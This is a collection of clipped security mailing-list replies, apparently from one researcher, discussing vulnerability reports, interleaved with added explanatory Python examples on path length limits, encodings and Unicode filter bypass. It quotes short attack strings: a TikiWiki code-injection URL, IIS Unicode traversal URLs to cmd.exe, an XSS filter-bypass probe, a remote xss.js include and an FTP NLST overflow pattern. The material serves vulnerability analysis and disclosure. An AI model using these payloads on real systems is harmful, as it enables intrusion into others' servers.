./A*/../A*/../A*/../A*/../A*/../A*/../A*/\r\n
GL> At least on win2k3. Therefore, the workarounds for kb975191 on
GL> microsoft.com are wrong.
GL> Guido Landi
GL> Vladimir '3APA3A' Dubrovin wrote:
>> Dear Thierry Zoller,
>>
>> I think yes, MKDIR
Dear Thierry Zoller,
I think yes, MKDIR is required. It should be a variation of
S99-003/MS02-018. The fuzzer should be very smart to create a directory and
use both an oversized buffer and ../ in NLST - it makes the path longer than
MAX_PATH with an existing directory.
--Monday, August 31, 20
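An added example, not part of the message above or of any FTP server's code, showing the mechanism the message describes: the request argument stays short, but a server that expands each `A*` wildcard against a directory the attacker created with MKDIR ends up with a path far longer than MAX_PATH. The server-side expansion (`expand_wildcards`) and the 260-byte `MAX_PATH` constant are assumptions written for illustration; the sample directory is constructed in a temporary folder.

```python
import fnmatch
import os
import tempfile

MAX_PATH = 260  # Windows MAX_PATH, the limit the message refers to (assumed constant)


def expand_wildcards(root, arg):
    """Emulate a server that expands every wildcard segment of an NLST
    argument against the real directory listing and only then works with
    the result.  Hypothetical server logic written for this example; the
    real daemon's code is not on the page."""
    stack = []   # directory components resolved so far, relative to root
    out = []     # the expanded string the server ends up with
    for seg in arg.split("/"):
        if seg in ("", "."):
            out.append(seg)
        elif seg == "..":
            if stack:
                stack.pop()
            out.append(seg)
        elif "*" in seg or "?" in seg:
            here = os.path.join(root, *stack)
            matches = sorted(n for n in os.listdir(here) if fnmatch.fnmatch(n, seg))
            if not matches:
                raise FileNotFoundError(seg)
            stack.append(matches[0])
            out.append(matches[0])   # two bytes "A*" become the whole long name
        else:
            stack.append(seg)
            out.append(seg)
    return "/".join(out)


def demo(name_len=200, repeats=6):
    """MKDIR one directory with a long name, then send the short pattern from
    the message; return (request argument length, expanded path length)."""
    with tempfile.TemporaryDirectory() as root:
        os.mkdir(os.path.join(root, "A" * name_len))   # the MKDIR step
        arg = "./" + "A*/../" * repeats                 # ./A*/../A*/../...
        expanded = expand_wildcards(root, arg)
        return len(arg), len(expanded)


if __name__ == "__main__":
    short, long_ = demo()
    print(f"argument: {short} bytes, expanded: {long_} bytes, MAX_PATH={MAX_PATH}")
```

With a 200-byte directory name and six `A*/../` repeats the 38-byte argument expands to over 1200 bytes, which is why a fuzzer that only sends long literal strings, without first creating a matching directory, never reaches this code path.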
Thierry,
I think the inability of antivirus / intrusion detection to catch something
that is not malware/intrusion, or malware in a form unused in the wild,
is not a vulnerability. Antivirus (generally) gives no preventive
protection. They can add signatures for your PoCs to their database
Dear Shaked Vax,
Are you sure the Radware Team has analysed the reflected attack via the user's
browser (the AppWall administrator visits a malcrafted page, the page redirects
his request to AppWall) before excluding the remote vector?
--Thursday, July 2, 2009, 3:23:16 PM, you wrote to
full-disclosure@lists.gr
ly by obfuscating a link sent to the
>> s> "admin" of the device. this would obviously rely on the admin clicking on
>> s> the link, and is more of a phishing / social engineering style attack.
>> this
>> s> would also rely on the router being setup with
Dear Tom Neaves,
It still can be exploited from the Internet even if "remote management" is
only accessible from the local network. If you can trick the user into visiting a Web
page, you can place a form on this page which targets the router, and the
request to the router is issued from the victim's browser.
--Tuesday
Dear Jim Parkhurst,
It may depend on the video card and video drivers and/or the amount of
memory/video memory. 9 years ago there was a vulnerability in Internet
Explorer with displaying a scaled image:
http://securityvulns.com/advisories/ie5freeze.asp results
Dear Stefan Kanthak,
As far as I can see, Internet Explorer actually uses flash10b.ocx.
Adobe
Flash Player 10.0 r22
--Monday, April 20, 2009, 8:17:24 PM, you wrote to bugt...@securityfocus.com:
SK> Windows Update (as well as Microsoft Update and the Automatic Update)
SK> installs an outdated (an
Dear iDefense Labs,
--Thursday, October 30, 2008, 11:24:35 PM, you wrote to [EMAIL PROTECTED]:
iL> VII. CVE INFORMATION
iL> The Common Vulnerabilities and Exposures (CVE) project has assigned the
iL> name CVE-2008-6432 to this issue. This is a candidate for inclusion in
iL> the CVE list (http
Dear SkyOut,
I see no security impact here.
RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\PCHealth\\ErrorReporting", 0, KEY_SET_VALUE, &hKey);
requires administrative privileges. If the user has them, you can achieve
better results by deleting the task manager or trojaning it.
You can also
Well, I can't say it's all fake... It's all junk.
FD> OpenSSL 0.9.7j
FD> openssl-0.9.7j/fips-1.0/aes/fips_aesavs.c 973: User supplied data
FD> copied into fixed length buffer on the stack with no length
FD> verification.
Buffer overflow in a non-suid test application (not compiled by default)
Dear Jose Nazario,
JN> te file you sent here contains a bunch of embeded nulls (every other
JN> character is 00). stripping those out reveals ... jose
JN> nazario, ph.d. http://monkey.org/~jose/
This is Little Endian UCS-2 Unicode, not a bunch of embedded nulls.
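An added example, not part of the exchange above, of the triage check that distinguishes UCS-2/UTF-16 text from a file with "embedded nulls": a BOM decides if one is present, otherwise the position of the NUL bytes (odd offsets for little-endian, even offsets for big-endian) does. The sniffing thresholds and the sample strings are constructed for this note.

```python
def sniff_and_decode(data):
    """Return (encoding, text) for a byte string that may be UTF-16.

    Order of checks: UTF-16 BOM first; then the NUL pattern of the first
    512 bytes (ASCII text in UTF-16-LE has NUL at every odd offset, in
    UTF-16-BE at every even offset); otherwise fall back to Latin-1 so no
    byte is lost.  Heuristic written for this example, not a library call."""
    if data.startswith(b"\xff\xfe"):
        return "utf-16-le", data[2:].decode("utf-16-le", errors="replace")
    if data.startswith(b"\xfe\xff"):
        return "utf-16-be", data[2:].decode("utf-16-be", errors="replace")
    sample = data[:512]
    if len(sample) >= 4:
        even, odd = sample[0::2], sample[1::2]
        nul_even, nul_odd = even.count(0), odd.count(0)
        # "every other character is 00" with the text bytes in between
        if nul_odd > 0.8 * len(odd) and nul_even < 0.2 * len(even):
            return "utf-16-le", data.decode("utf-16-le", errors="replace")
        if nul_even > 0.8 * len(even) and nul_odd < 0.2 * len(odd):
            return "utf-16-be", data.decode("utf-16-be", errors="replace")
    return "latin-1", data.decode("latin-1")


# Constructed samples: the kind of file the reply describes, plus the other cases.
SAMPLE_LE_NO_BOM = "Dear Jose, this is UCS-2".encode("utf-16-le")
SAMPLE_BE_BOM = b"\xfe\xff" + "big endian".encode("utf-16-be")
SAMPLE_ASCII = b"plain text, no nulls"

if __name__ == "__main__":
    for raw in (SAMPLE_LE_NO_BOM, SAMPLE_BE_BOM, SAMPLE_ASCII):
        enc, text = sniff_and_decode(raw)
        print(f"{enc:9s} {text!r}")
```

Stripping the NULs, as the quoted reply did, happens to work for ASCII content but destroys any character above U+00FF; decoding with the detected codec keeps the text intact.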
Dear Nick FitzGerald,
--Monday, January 14, 2008, 2:52:23 PM, you wrote to
full-disclosure@lists.grok.org.uk:
NF> U -- the only part of that likely to be relevant here is the last.
NF> These kinds of web page "compromises" are typically achieved through
NF> bad/ill-configured/non-updated
Dear crazy frog crazy frog,
Clear your computer of the trojan, change the FTP password for your site
hosting access, because it's stolen, access your hosting account via
FTP and remove the additional text (usually at the end of the file, after
) from all HTML/PHP pages.
--Sunday, January 13,
n multiple persistent cross-site
scriptings
Original article: http://websecurity.com.ua/1596/
XSS in Math Comment Spam Protection < 2.2
Original article: http://websecurity.com.ua/1576/
XSS in Captcha! <= 2.5d
Original article: http://websecurity.com.ua/1588/
--
http://securityvulns.com/
/
to reCaptcha developers, vulnerability is in Drupal code.
Original article: http://websecurity.com.ua/1505/
Exploit: http://websecurity.com.ua/uploads/2007/MoBiC/reCaptcha.txt
--
http://securityvulns.com/
/\_/\
{ , . } |\
+--oQQo->{ ^ }<-+ \
|
Dear [EMAIL PROTECTED],
SNMP is used to monitor the printing queue status with the LPR or RAW printing
protocol. This is a standard feature in e.g. Windows and is not HP
specific. You can find this option in the port settings.
--Friday, December 28, 2007, 7:01:40 PM, you wrote to
full-disclosure@lis
Dear [EMAIL PROTECTED],
VKve> Thank you, Captain Obvious - I specifically *said* that only one of them
VKve> needs to be blind spoofing.
There is a difference between "you needn't", "you can't" and "you
won't". You say you needn't spoof another one. I say you won't and you
can't.
VKve>
Oct 2007 00:43:10 +0400, 3APA3A said:
>> Randomized ISN doesn't protect against MitM.
VKve> Doing a MitM is basically just spoofing two connections at the
VKve> same time. If you know how to do one, you know how to do two. And
VKve> if you know how to do one of them *
Valdis, you should go back to the Cretaceous period, because Oliver talks
about a man-in-the-middle attack, not about blind TCP spoofing.
Randomized ISN doesn't protect against MitM.
--Thursday, October 25, 2007, 9:40:53 PM, you wrote to [EMAIL PROTECTED]:
VKve> On Thu, 25 Oct 2007 10
cal network.
--
http://securityvulns.com/
/\_/\
{ , . } |\
+--oQQo->{ ^ }<-+ \
| ZARAZA U 3APA3A } You know my name - look up my number (The Beatles)
+-o66o--+ /
|/
___
Full-Disclosure -
Dear Paul Szabo,
Messages like this that I've got are PDF spam without an attempt to exploit
anything, and have been spammed since July. Not sure about this one though.
--Tuesday, October 23, 2007, 4:18:52 PM, you wrote to
full-disclosure@lists.grok.org.uk:
PS> In case you are interested... messages l
Dear Radu State,
As far as I understood the issue, it requires an active Man-in-the-Middle
attack. Digest authentication, like any authentication without traffic
encryption or traffic signing, doesn't protect against active M-i-t-M,
because active M-i-t-M can always force the client to
Dear Kristian Erik Hermansen,
Cannot reproduce it on patched Windows XP. Maybe it's the DynaZIP library
buffer overflows fixed with MS04-34.
--Monday, October 15, 2007, 12:19:31 PM, you wrote to
full-disclosure@lists.grok.org.uk:
KEH> I tested this on three Windows XP machines and was able to ma
Dear Moritz Naumann,
This vulnerability was found by ShAnKaR
http://securityvulns.ru/Sdocument162.html
and reported on Bugtraq yesterday (see the "Vulnerabilities digest"
message). TikiWiki developers were informed on October 8.
--Friday, October 12, 2007, 1:20:06 AM, you wrote to
f
:
http://www.example.com/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=
Original message (in Russian):
http://securityvulns.ru/Sdocument162.html
Also, multiple vulnerabilities were reported in English by
:: iNs @ uNkn0wn.eu
Dear Thierry Zoller,
--Saturday, October 6, 2007, 9:06:51 PM, you wrote to [EMAIL PROTECTED]:
TZ> Dear Geo.,
G>> If the application is what exposes the URI handling routine to untrusted
G>> code from the internet,
TZ> Sorry, Untrusted code from the internet ?
TZ> The user clicks on a mailto l
Dear iDefense Labs,
--Wednesday, October 3, 2007, 6:32:03 PM, you wrote to [EMAIL PROTECTED]:
iL> The vulnerability exists in the kernel ioctl() handler for FIFOs. The
iL> I_PEEK ioctl is used to peek at a number of bytes contained in the FIFO
iL> without actually removing them from the queue. O
Dear Panda Security Response,
[EMAIL PROTECTED] was contacted about this same vulnerability in
Panda Antivirus 2007 on August 11, 2006 (more than a year ago) without
any results or response, until the information was published on Bugtraq.
As far as I can see, pandasecurity.com is Swedish
Dear Kees Cook,
CVE-2007-4033 is "Buffer overflow in php_gd2.dll in the gd (PHP_GD2)
extension in PHP 5.2.3 allows context-dependent attackers to execute
arbitrary code via a long argument to the imagepsloadfont function."
Please, provide valid CVE entry.
--Thursday, September 20, 2007,
Dear [EMAIL PROTECTED],
Either the Subject "UPX parsing Arbitrary CodeExecution" or the vulnerability
description "Infinite Loop in UPX packed files parsing" is wrong. Can
you provide more detailed information please? It's not clear how an
infinite loop can lead to remote code execution.
--Fri
re available from
http://securityvulns.com/source13951.html
Dear Joey Mengele,
Of course, it's a mitigating factor. But:
default PATH_MAX under Linux is 4096, and it's not hard to create a
file/folder with a longer path; it's impossible to access it,
E.g. a folder with a path longer than PATH_MAX:
bash$ pwd
pwd: could not get current directory: get
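An added example, not part of the message above, reproducing its point on a live system: the tree is built with `chdir` and relative names, so no single system call ever sees the whole path, yet the resulting absolute path is longer than PATH_MAX and `open()` on it fails with ENAMETOOLONG, while the file stays reachable by walking in one component at a time. The 4096 constant, the depth and the component length are assumptions chosen to exceed the limit; everything is created under a temporary directory and removed afterwards.

```python
import errno
import os
import shutil
import tempfile

PATH_MAX = 4096   # the Linux default the message quotes (assumed constant)


def make_deep_file(base, depth=20, name_len=250):
    """Create base/<c0>/<c1>/.../secret.txt one component at a time, with
    chdir + relative names, so no single system call sees the full path.
    Returns the list of directory components."""
    comps = [f"{i:02d}" + "x" * (name_len - 2) for i in range(depth)]
    saved = os.getcwd()
    try:
        os.chdir(base)
        for comp in comps:
            os.mkdir(comp)
            os.chdir(comp)
        with open("secret.txt", "w") as fh:
            fh.write("reachable with relative names only\n")
    finally:
        os.chdir(saved)
    return comps


def probe(depth=20, name_len=250):
    """Build the tree and report how absolute and relative access behave."""
    base = tempfile.mkdtemp()
    result = {}
    try:
        comps = make_deep_file(base, depth, name_len)
        abs_path = os.path.join(base, *comps, "secret.txt")
        result["path_len"] = len(abs_path)
        try:                                   # absolute path longer than PATH_MAX
            open(abs_path).close()
            result["abs_open"] = "ok"
        except OSError as e:
            result["abs_open"] = errno.errorcode.get(e.errno, str(e.errno))
        saved = os.getcwd()
        try:                                   # walk in component by component
            os.chdir(base)
            for comp in comps:
                os.chdir(comp)
            with open("secret.txt") as fh:
                result["rel_read"] = fh.read().strip()
            try:                               # what pwd / getcwd() sees from here
                os.getcwd()
                result["getcwd"] = "ok"
            except OSError as e:
                result["getcwd"] = errno.errorcode.get(e.errno, str(e.errno))
        finally:
            os.chdir(saved)
    finally:
        shutil.rmtree(base)   # fd-relative removal, so the long path is no obstacle
    return result


if __name__ == "__main__":
    for key, value in probe().items():
        print(f"{key:9s} {value}")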
Dear Andrew Farmer,
And this one is not even new:
http://seclists.org/bugtraq/2005/Jul/0521.html
--Monday, August 6, 2007, 2:40:57 PM, you wrote to [EMAIL PROTECTED]:
AF> On 05 Aug 07, at 15:48, Beyond Security wrote:
>> /*
>> * off by one ebp overwrite in sudo prompt parsing function
>> *
Dear Mesut EREN,
http://securityvulns.com/search/soft.asp?sofname=horde
--Thursday, August 2, 2007, 10:09:31 AM, you wrote to
full-disclosure@lists.grok.org.uk:
ME> Hello everybody
ME> The Horde Mail is any have Vulnerability??
ME> I use to Horde Mail i want to test my email system.. Than
Dear [EMAIL PROTECTED],
Seems to be Another George Bush Fan.
You know, there is a vulnerability in all media players, it can be
exploited by opening an MP3 file with George Bush's bathroom singing. George
Bush fans are not vulnerable, yet they are still vulnerable to the one you
described.
Dear coderman,
Whhooo! We will not see SPAM any more, because all botnets will be
overloaded with hash hacking!
--Monday, July 30, 2007, 11:30:51 PM, you wrote to [EMAIL PROTECTED]:
c> On 7/30/07, coderman <[EMAIL PROTECTED]> wrote:
>> gotta pay off that copacobana? 10,000 hashes for brea
Dear Tremaine Lea,
--Monday, July 30, 2007, 4:09:53 PM, you wrote to [EMAIL PROTECTED]:
TL> -BEGIN PGP SIGNED MESSAGE-
TL> Hash: SHA1
TL> $1-10/hash, and I'd actively seek/support an open source option.
5-10 days for a full bruteforce? John-the-Ripper on a modern multi-core PC.
Dear [EMAIL PROTECTED],
--Tuesday, July 24, 2007, 5:02:16 PM, you wrote to
full-disclosure@lists.grok.org.uk:
jkc> It seems to me the average SNR here could be greatly improved with any
jkc> one of several commonly available "community-based" filtering
jkc> mechanisms. Digg and Slashdot are b
Dear [EMAIL PROTECTED],
Please explain why this is a "vulnerability" and not "just a bug".
--Friday, July 13, 2007, 5:26:17 PM, you wrote to
full-disclosure@lists.grok.org.uk:
esvnc> TeamIntell discovered local buffer overflow vulnerability
esvnc> in PIRS2007 (data collection of companies and
Dear Paul Craig,
--Wednesday, July 11, 2007, 1:37:03 AM, you wrote to [EMAIL PROTECTED]:
PC> http://www.test.com/scripts%c0%afcmd.exe
PC> http://www.test.com/scripts%e0%80%afcmd.exe
PC> http://www.test.com/scripts%c1%9ccmd.exe
PC> Web servers located behind a Tippingpoint IPS device which are c
sage (in Russian): http://securityvulns.ru/Rdocument425.html
Dear Jamie Riden,
--Wednesday, June 20, 2007, 4:39:21 PM, you wrote to [EMAIL PROTECTED]:
JR> (This is what I gathered from the original posting, but I might be wrong.)
JR> I think the issue is not that the apache server behaviour is wrong as
JR> such,
Original BreakingPoint articles author
Dear H D Moore,
--Tuesday, June 19, 2007, 11:20:41 PM, you wrote to
full-disclosure@lists.grok.org.uk:
HDM> $ echo -ne "\r\n\r\n\r\n\r\n\r\n /buggy.php HTTP/1.0\r\n\r\n" | \
HDM> nc webserver 80
According to the recommendations of RFC 2616, section 4.1, a Web server or
proxy server should ig
forum message.
(no further details are given by the advisory author).
:35:17 PM, you wrote to [EMAIL PROTECTED]:
k> Btw,
k> Here is a screenshot of the effect.
k> -Original Message-
k> From: kingcope [mailto:[EMAIL PROTECTED]
k> Sent: Wednesday, May 23, 2007 10:55 AM
k> To: '3APA3A'
k> Cc: 'Full-Disclosure'; '[EM
# method which checks the path (for example /AUX.aspx is blocked).
k> Best Regards,
k> Kingcope
k> -----Original Message-
k> From: 3APA3A [mailto:[EMAIL PROTECTED]
k> Sent: Wednesday, May 23, 2007 10:41 AM
k> To: kingcope
k> Cc: Full-Disclosure; [EMAIL PROTECTED]
k> Sub
Dear kingcope,
It's a vulnerability regardless of DoS impact, because it allows an attacker
to access special DOS devices (COM1 in this case). E.g. it could be used
to read data from a device attached to COM1 or prevent another application
from accessing this port (or LPT), because access to ports is ex
%u00ABscript%u00BB
in different environments to bypass filtering in this way?
Dear Brian Eaton,
--Monday, May 21, 2007, 11:28:27 PM, you wrote to [EMAIL PROTECTED]:
BE> Given how few application platforms decode full-width unicode to ASCII
BE> equivalents, is there a case to be made that those application
BE> platforms that do decide this conversion is a good idea are bro
Dear Brian Eaton,
--Monday, May 21, 2007, 11:48:09 PM, you wrote to [EMAIL PROTECTED]:
BE> On 5/21/07, 3APA3A <[EMAIL PROTECTED]> wrote:
>> It's not true, because it's quite convertible character. At least for IIS:
>>
>> http://example.com/test.asp?q=%u
Dear Brian Eaton,
--Monday, May 21, 2007, 6:22:21 PM, you wrote to [EMAIL PROTECTED]:
BE> If the SQL engine is processing queries in ASCII or ISO-8859-1, the
BE> conversion from unicode to the code page used by the engine will fail.
BE> Either the engine will give up on the query, or it might s
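An added example, not part of this thread, tracing a query through the three stages the exchange is about: an IIS-style `%uXXXX` decode, a filter that only looks for ASCII `<` and `>`, and a later conversion to a narrow code page that folds "convertible" characters onto ASCII. NFKC normalization stands in for the full-width mapping (U+FF1C and U+FF1E do decompose to `<` and `>`); the guillemet pair used in the `%u00ABscript%u00BB` probe is added as an assumed best-fit entry to mirror that probe, since the real table belongs to whatever code page the back end uses. All functions and inputs are constructed for this note.

```python
import re
import unicodedata
import urllib.parse

_U_ESCAPE = re.compile(r"%u([0-9a-fA-F]{4})")   # IIS-specific %uXXXX form

# Best-fit pairs beyond what NFKC folds.  Assumed for this example to mirror
# the probe in the message (guillemets to angle brackets); the real table is
# the back end's code-page mapping.
BEST_FIT_EXTRA = str.maketrans({"\u00ab": "<", "\u00bb": ">"})


def iis_style_unescape(query):
    """Decode %uXXXX first, then the usual %XX escapes."""
    query = _U_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), query)
    return urllib.parse.unquote(query)


def filter_allows(text):
    """A filter that searches for ASCII angle brackets only (True = passed)."""
    return "<" not in text and ">" not in text


def best_fit(text):
    """What a narrow-code-page conversion may do: NFKC maps the full-width
    block U+FF01..U+FF5E onto ASCII, the table above adds the guillemets."""
    return unicodedata.normalize("NFKC", text).translate(BEST_FIT_EXTRA)


def trace(query):
    """Run one query through decode -> filter -> conversion, report each stage."""
    decoded = iis_style_unescape(query)
    converted = best_fit(decoded)
    return {
        "decoded": decoded,
        "filter_allows": filter_allows(decoded),
        "converted": converted,
        "script_tag": "<script>" in converted.lower(),
    }


if __name__ == "__main__":
    for q in ("%3Cscript%3E", "%u00ABscript%u00BB", "%uFF1Cscript%uFF1E"):
        print(q, trace(q))
```

The plain `%3Cscript%3E` is stopped by the filter; both encoded variants pass it and only become `<script>` after the conversion, which is the ordering problem the thread is arguing about: a filter that runs before the last character-set conversion is checking a different string than the one the consumer sees.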
Dear Davide Del Vecchio,
It's also possible to recover deleted photos from almost any flash card
in almost any device (camera, mobile, etc.) - it's the way general purpose
file systems work. The requirement to delete information securely is
enforced in devices certified to e.g. process US mil
Dear Tim Brown,
--Friday, May 4, 2007, 1:50:40 AM, you wrote to [EMAIL PROTECTED]:
TB> On Thursday 03 May 2007 22:13:15 3APA3A wrote:
>> This vulnerability for D-Link DSL-G624T was already reported by Jose
>> Ramon Palanco. See
>>
>> http://securityvulns.
Dear Tim Brown,
This vulnerability for D-Link DSL-G624T was already reported by Jose
Ramon Palanco. See
http://securityvulns.ru/Odocument816.html
Previously, the same problem was reported for D-Link DSL-G604T by Qex
http://securityvulns.ru/Mdocument578.html
There were also a few more problems r
Dear carl hardwick,
Do you know examples of phishing sites exploiting this vulnerability?
--Wednesday, April 18, 2007, 1:47:03 PM, you wrote to
full-disclosure@lists.grok.org.uk:
ch> This flaw
ch>
http://kaneda.bohater.net/security/20070111-firefox_2.0.0.1_bypass_phishing_protection.php
ch> r
Dear carl hardwick,
Both Firefox 2.0.0.3 and IE 6.0.2900.2180 resisted (Firefox stops
loading the page after 500MB of memory, IE warns about a script slowing down
performance). It's a simple memory bomb; probably you are vulnerable
because you have <= 512 MB of RAM.
--Tuesday, April 17, 20
Dear Michal Majchrowicz,
This feature is not intended to protect against XSS, it's only intended
to inform you that some information is transmitted in cleartext. You can
simply change
src="http://server2.com/xss.js
to
src="https://server2.com/xss.js
to avoid this message.
--Wednesday, A
Dear Michał Majchrowicz,
This image also effectively exploits a stack overflow (?) in FastStone
Image Viewer 2.8, EIP/EBP is 0x41414141.
--Monday, March 26, 2007, 12:20:07 AM, you wrote to [EMAIL PROTECTED]:
MM> Everytime you try to turn on the slideshow with a JPG file in the
MM> folder
Dear Tim,
--Wednesday, March 21, 2007, 7:24:35 PM, you wrote to
full-disclosure@lists.grok.org.uk:
T> Secondly, 3APA3A, birthday attacks against the collision-resistance
T> property of a hash take approximately 2^(b/2) time, where b is the
T> number of bits. That is, brute-force
at 160-bits) were 100% secure. The attack
BB> under discussion is reported to reduce that to the neighborhood of
BB> 60-something bits.
BB> I am not a mathematician though, so I would be perfectly willing to
BB> believe I was wrong about that.
BB>
and 3 years after losing my last pencil I may be
completely wrong in computations :)
--Wednesday, March 21, 2007, 9:48:55 PM, you wrote to [EMAIL PROTECTED]:
BB> 3APA3A wrote:
>> I know meaning of 'hash function' term, I wrote few articles on
>> challenge-respon
er calling ability to
bruteforce 160-bit hash 2000 times faster 'a crack'?
--Wednesday, March 21, 2007, 8:53:27 PM, you wrote to [EMAIL PROTECTED]:
BB> 3APA3A wrote:
>> First, by reading 'crack' I thought lady can recover full message by
>> it's s
Dear Michael Silk,
First, by reading 'crack' I thought the lady can recover the full message by
its signature. After careful reading, she can bruteforce collisions 2000
times faster.
SHA-1 is a 160 bit hash. Bruteforced 2000 times faster, it retains the
strength of a 149-bit hash for bruteforce co
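An added worked computation, not part of the message above, tying together the three figures quoted in this thread: the "2000 times faster" here, the "60-something bits" in BB's reply and the $2^{b/2}$ birthday bound in Tim's reply. A 2000-fold speed-up removes $\log_2 2000$ bits of work from whichever search it applies to:

$$
\log_2 2000 \approx 10.97, \qquad
\frac{2^{160}}{2000} \approx 2^{149} \;\text{(finding a message for a given 160-bit hash)}, \qquad
\frac{2^{80}}{2000} \approx 2^{69} \;\text{(finding any two colliding messages)}.
$$

The 149-bit figure is the one the message computes and it is right for a preimage search, where the generic cost is $2^{160}$. A collision search was never $2^{160}$ work: with $b = 160$ the generic birthday cost is $2^{b/2} = 2^{80}$, and $2^{80}/2000 \approx 2^{69}$ is the figure announced for the 2005 SHA-1 collision result, which is where the "60-something bits" in the thread comes from.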
Dear starcadi,
Again, a very effective way for a user to exploit himself. How can you
elevate your privileges that way? Is dkftpbench suid?
--Monday, March 19, 2007, 10:32:27 PM, you wrote to
full-disclosure@lists.grok.org.uk:
s> Description:
s> dkftpbench is an FTP benchmark program inspire
Dear starcadi,
A very effective way for a user to exploit himself. How can you elevate
your privileges this way? Is cftp suid?
--Tuesday, March 20, 2007, 12:52:13 AM, you wrote to
full-disclosure@lists.grok.org.uk:
s> Description:
s> CFTP is Comfortable FTP, a full screen ftp client.
s> Proo
Dear Thor (Hammer of God),
You are wrong at least for Windows XP/2003. There is a common temporary
directory
%WINDIR%\Temp
It's used as %TEMP% if the application is launched without local logon,
e.g. a system service.
For example, services launched with the LocalSystem account will have this
Dear Laundrup, Jens,
C:\TEMP is not the best example, but there are others.
Microsoft Word creates a temporary file with a predictable name in the same
directory as the document. In the case of directory permissions like:
Users: Add & List
Creator Owner: Full control
(one user should not read documents
Dear Michele Cicciotti,
--Friday, March 9, 2007, 9:00:05 PM, you wrote to
full-disclosure@lists.grok.org.uk:
>> Scenario 1.1:
>>
>> Bob wishes to create "Bob private data" folder in "Public" folder to
>> place few private files. "Public" has at least "Write" permissions for
>> "User" g
Dear Roger A. Grimes,
--Friday, March 9, 2007, 6:49:13 PM, you wrote to [EMAIL PROTECTED]:
RAG> For one, I've been a sys admin for 20 years and NEVER created a
RAG> private folder under a public folder.
Nice. What about creating a "Sales Reports" folder only the head of the Sales
department has
Dear M. Burnett,
--Friday, March 9, 2007, 7:12:31 AM, you wrote to [EMAIL PROTECTED]:
MB> 3APA3A, I just wanted to say that is very clever research you have done.
MB> It's true that this does require some re-thinking of security practices, but
MB> I don't think it
noted by everyone, but was unnoticed for
10 years.
RAG> Roger
RAG> *
RAG> *Roger A. Grimes, InfoWorld, Security Columnist
RAG> *CPA, CISSP, MCSE: Security (2000/2003/MVP), CEH, yada...yad
: 3APA3A, http://securityvulns.com/
Vendor: Microsoft (and potentially another vendors)
Products: Microsoft Windows Vista/2003/XP/2000, Microsoft resource kit
for Windows 2000 and different utilities.
Access Vector: Local
Type: multiple/complex (weak design, insecure file operations, etc
Hello mopb,
phpinfo() cross-site scripting
http://www.php-security.org/MOPB/MOPB-08-2007.html
was initially(?) reported in 2003 by Silent Needle
http://securityvulns.com/docs4647.html
Probably, it's the same or a related issue to the one reported by nicob at nicob.net.
http://securityvulns.com/news/KIWI/CatTools/DT.html
CVE-2007-0888
--Wednesday, February 28, 2007, 12:47:17 AM, you wrote to
bugtraq@securityfocus.com:
n> Path traversal security vulnerability in Kiwi CatTools TFTP up to 3.
rver/citrix where all our stored documents can be stolen.
AT> In that case, only a software restriction policy will protect us.
AT> regards,
AT> Andres Tarasco
AT> 2007/2/22, 3APA3A <[EMAIL PROTECTED]>:
>>
>>
>>
>> Title: Microsoft Wi
Title: Microsoft Windows 2000/XP/2003/Vista ReadDirectoryChangesW
information leak
Author: 3APA3A, http://securityvulns.com
Affected: Microsoft Windows 2000,XP,2003,Vista
Exploitable:Yes
Type: Remote (from local network), authentication
Dear Rajesh Sethumadhavan,
As Michal Zalewski pointed out, there is no "critical" security impact,
because you (as attacker) can force the browser to open files (it's a common
thing, you can do it in any browser), but you can not access the content of
these files. The only security impact in a few cases i
Dear Michal Zalewski,
Mitigating factor: it doesn't work through a proxy, because for a proxy the URI
is sent instead of the URL and the request will be incomplete.
GET http://evil.com
--Thursday, February 15, 2007, 1:23:01 AM, you wrote to [EMAIL PROTECTED]:
MZ> 'evil.com\x00foo.example.com' to be a part
: CVE-2007-0842
Author: 3APA3A, http://SecurityVulns.com/
Advisory URL: http://SecurityVulns.com/advisories/year3000.asp
Intro:
Since Microsoft Visual Studio 5.0, the Visual C++ compiler defaults the time_t
type to a 64-bit integer and time functions to their 64-bit variants.
Vulnerability:
64
unprivileged user to Local System or
another user's account.
Author: 3APA3A <[EMAIL PROTECTED]>, http://SecurityVulns.com
Advisory URL: http://securityvulns.com/advisories/nnmrc.asp
SecurityVulns news URL: http://securityvulns.com/news/HP/NNM/RC/WP.html
CVE:CVE-2007-0819
Dear [EMAIL PROTECTED],
--Tuesday, February 6, 2007, 2:17:55 AM, you wrote to
full-disclosure@lists.grok.org.uk:
whc> I found this in deleted edits on english Wikipedia on Bluepill
whc> Vista backdoor security researcher Joanna Rutkowska:
whc> http://www.rutkowska.yoyo.pl
whc> What is goin
Dear lsi,
This approach is already implemented, at least partially, to limit the
functionality of unknown applications. It can be found in multiple
personal firewalls or things like http://www.securesize.com/GeSWall/
There is a better approach - every "good" application should be signed
Dear XFOCUS Security Team,
A more complicated variant of this vulnerability (exhausting all
available descriptors and closing the standard ones) was reported by Joost
Pol for BSD systems. It's very funny to see commercial Unix variants
were not checked against it and the simplest variant of
Dear Robert Swiecki,
--Sunday, January 14, 2007, 2:49:58 AM, you wrote to bugtraq@securityfocus.com:
RS> User-Agent: &*^ VDjh;
RS> olsMoasdasdzilla2%$(ls)2=++/-2121%&^#%^@&37.0 (X1230#$(ls)`ls`)
RS> asd%^*&%^dasdnhy/ Mnenhy/0.7.4.0
H. It doesn't seem like an attempt to exploit
Dear /dev/null,
To manipulate GINA you need administrative privileges.
--Friday, December 29, 2006, 3:34:51 AM, you wrote to
full-disclosure@lists.grok.org.uk:
dn> Hi,
dn> This if from MS forums:
dn> http://forums.microsoft.com/MSDN/ShowPost.aspx?PostID=1043407&SiteID=1
dn> Tested on Windows
Dear 0o_zeus_o0 elitemexico.org,
Thanks, published. http://www.security.nnov.ru/source13365.html
--Friday, December 22, 2006, 11:55:17 PM, you wrote to [EMAIL PROTECTED]:
0eo> ###
0eo> # Advisory #15 Title: Multiple Remote
before second free().
--Thursday, December 21, 2006, 11:11:29 PM, you wrote to [EMAIL PROTECTED]:
AS> 3APA3A wrote:
>> Killer{R} assumes the problem is in strcpy(), because it should not be
>> used for overlapping buffers, but at least ANSI implementation of strcpy
>> from
Dear Michele Cicciotti,
--Thursday, December 21, 2006, 6:20:54 PM, you wrote to
full-disclosure@lists.grok.org.uk:
>> There is interesting thing with event logging on Windows. The only
>> security aspect of it is event log record tampering and performance
>> degradation, but it may
Dear Tim,
